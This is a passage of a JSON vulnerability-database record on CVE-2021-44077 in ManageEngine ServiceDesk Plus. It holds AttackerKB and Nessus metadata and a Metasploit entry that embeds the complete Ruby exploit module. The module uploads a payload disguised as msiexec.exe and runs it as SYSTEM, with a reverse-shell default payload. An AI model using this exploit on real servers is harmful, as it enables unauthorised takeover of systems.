"NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-12-09T07:41:32", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44077"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5", "RAPID7BLOG:45C740B931E148E6075FD00036A389CB"]}, {"type": "cisa", "idList": ["CISA:DD18BE6DC961451834F7597A6E8AAE45", "CISA:72D01121CAFBC56638BC974ABA539CF8"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "nessus", "idList": ["MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}, {"type": "threatpost", "idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "thn", "idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-09T07:41:32", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-12-09T07:41:32", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", "published": "2021-12-08T19:41:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2021-12-09T00:00:00"}, "lastseen": "2021-12-09T07:41:32", "differentElements": ["last_activity", "modified", "published", "references", "references_categories", "wildExploitedReports"], "edition": 2}, {"bulletin": {"id": "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1", "vendorId": null, "hash": "553fd58399c04d83f19c7a8d2a7d1b04", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2021 7:41pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2022-01-10T00:00:00", "modified": "2022-01-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2022-01-11T11:32:00", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44077"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:DD18BE6DC961451834F7597A6E8AAE45"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "nessus", "idList": ["MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "threatpost", "idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "thn", "idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2022-01-11T11:32:00", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2022-01-11T11:32:00", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", "published": "2021-12-08T19:41:00"}, {"category": "Government or Industry Alert", "source_url": "https://www.ic3.gov/Media/News/2021/211203.pdf", "published": "2022-01-10T17:07:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077"], "Miscellaneous": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2022-01-10T17:07:00"}, "lastseen": "2022-01-11T11:32:00", "differentElements": ["cvelist"], "edition": 3}, {"bulletin": {"id": "AKB:72CD807D-E26D-4F68-8717-436863B7F8B1", "vendorId": null, "hash": "3e6959e314025700347956ae7a013cdc", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.\n\n \n**Recent assessments:** \n \n**wvu-r7** at December 08, 2021 7:41pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2022-01-10T00:00:00", "modified": "2022-01-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html"], "cvelist": ["CVE-2021-44077", "CVE-2021-45105"], "immutableFields": [], "lastseen": "2022-01-19T17:27:52", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44077"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:DD18BE6DC961451834F7597A6E8AAE45"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "nessus", "idList": ["MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "threatpost", "idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "thn", "idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2022-01-11T11:32:00", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2022-01-11T11:32:00", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", "published": "2021-12-08T19:41:00"}, {"category": "Government or Industry Alert", "source_url": "https://www.ic3.gov/Media/News/2021/211203.pdf", "published": "2022-01-10T17:07:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077"], "Miscellaneous": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2022-01-10T17:07:00"}, "lastseen": "2022-01-19T17:27:52", "differentElements": ["cvelist"], "edition": 4}], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44077"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:DD18BE6DC961451834F7597A6E8AAE45"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "nessus", "idList": ["MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:81CC7A43B010B785FD5977FBA1043E11"]}, {"type": "thn", "idList": ["THN:A29E47C7A7467A109B420FF0819814EE", "THN:60B42277F576BB78A640A9D3B976D8D8", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2022-01-19T20:29:57", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2022-01-19T20:29:57", "rev": 2}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {"Government or Industry Alert": ""}, "wildExploitedReports": [{"category": "Government or Industry Alert", "source_url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", "published": "2021-12-08T19:41:00"}, {"category": "Government or Industry Alert", "source_url": "https://www.ic3.gov/Media/News/2021/211203.pdf", "published": "2022-01-10T17:07:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077"], "Miscellaneous": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "http://packetstormsecurity.com/files/165400/ManageEngine-ServiceDesk-Plus-Remote-Code-Execution.html"]}, "tags": ["common_enterprise", "easy_to_develop", "high_privilege_access", "pre_auth", "default_configuration"], "mitre_vector": {}, "last_activity": "2022-01-10T17:07:00", "_object_type": "robots.models.attackerkb.AttackerKB", "_object_types": ["robots.models.base.Bulletin", "robots.models.attackerkb.AttackerKB"]}], "metasploit": [{"id": "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/", "vendorId": null, "hash": "fa3d3152adb734ee9bddc048e1c7e831", "type": "metasploit", "bulletinFamily": "exploit", "title": "ManageEngine ServiceDesk Plus CVE-2021-44077", "description": "This module exploits CVE-2021-44077, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk Plus, to upload an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that build 11305 is vulnerable to the authentication bypass but not the file upload. The module will check for an exploitable build.\n", "published": "2021-12-23T18:27:57", "modified": "2021-12-23T18:27:57", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_servicedesk_plus_cve_2021_44077/", "reporter": "wvu <wvu@metasploit.com>, Y4er", "references": [], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-12-28T18:38:10", "history": [], "viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:72CD807D-E26D-4F68-8717-436863B7F8B1"]}, {"type": "cve", "idList": ["CVE-2021-44077"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:DD18BE6DC961451834F7597A6E8AAE45"]}, {"type": "nessus", "idList": ["MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "threatpost", "idList": ["THREATPOST:81CC7A43B010B785FD5977FBA1043E11", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "thn", "idList": ["THN:60B42277F576BB78A640A9D3B976D8D8", "THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-28T18:38:10", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-12-28T18:38:10", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',\n 'Description' => %q{\n This module exploits CVE-2021-44077, an unauthenticated remote code\n execution vulnerability in ManageEngine ServiceDesk Plus, to upload an\n EXE (msiexec.exe) and execute it as the SYSTEM account.\n\n Note that build 11305 is vulnerable to the authentication bypass but\n not the file upload. The module will check for an exploitable build.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'wvu', # Analysis and exploit\n 'Y4er' # Additional confirmation\n ],\n 'References' => [\n ['CVE', '2021-44077'],\n ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],\n ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],\n ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],\n ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],\n ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],\n ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup\n ],\n 'DisclosureDate' => '2021-09-16',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8080,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n # NOTE: /RestAPI/ImportTechnicians was removed after build 11303\n unless res.code == 200 && res.get_html_document.at('//form[@name=\"ImportTechnicians\"]')\n return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')\n end\n\n CheckCode::Appears('/RestAPI/ImportTechnicians is present.')\n end\n\n def exploit\n upload_msiexec\n execute_msiexec\n end\n\n def upload_msiexec\n print_status('Uploading msiexec.exe')\n\n form = Rex::MIME::Message.new\n form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name=\"step\"')\n form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',\n 'form-data; name=\"theFile\"; filename=\"msiexec.exe\"')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')\n fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')\n end\n\n print_good('Successfully uploaded msiexec.exe')\n end\n\n def execute_msiexec\n print_status('Executing msiexec.exe')\n\n # This endpoint \"won't\" return\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),\n 'vars_post' => {\n 'execute' => 's247AgentInstallationProcess'\n }\n }, 0)\n end\n\n # XXX: FileDropper dies a miserable death if the file is in use\n def on_new_session(_session)\n super\n\n # Working directory is C:\\Program Files\\ManageEngine\\ServiceDesk\\site24x7\n print_warning(\"Yo, don't forget to clean up ..\\\\bin\\\\msiexec.exe\")\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}], "nessus": [{"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "a8aaa682885898f9a54c84af534c8728", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-20T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515", "http://www.nessus.org/u?fa9e3175"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2022-01-19T23:45:12", "history": [{"bulletin": {"id": "MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "vendorId": null, "hash": "c2f58dbccdd153eda4f2fd9251f46f2f", "type": "nessus", "bulletinFamily": "scanner", "title": "ManageEngine Desktop Central < 10.1.2127.18 / 10.1.2128.0 < 10.1.2137.3 Authentication Bypass (CVE-2021-44515)", "description": "The ManageEngine Desktop Central application running on the remote host is prior to 10.1.2127.18, or 10.1.2128.0 prior to 10.1.2137.3. It is, therefore, affected by an authentication bypass vulnerability which can allow an adversary to bypass authentication and execute arbitrary code in the Desktop Central server.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-12-06T00:00:00", "modified": "2021-12-06T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/155865", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?fa9e3175", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44515"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-08T00:25:12", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}, {"type": "thn", "idList": 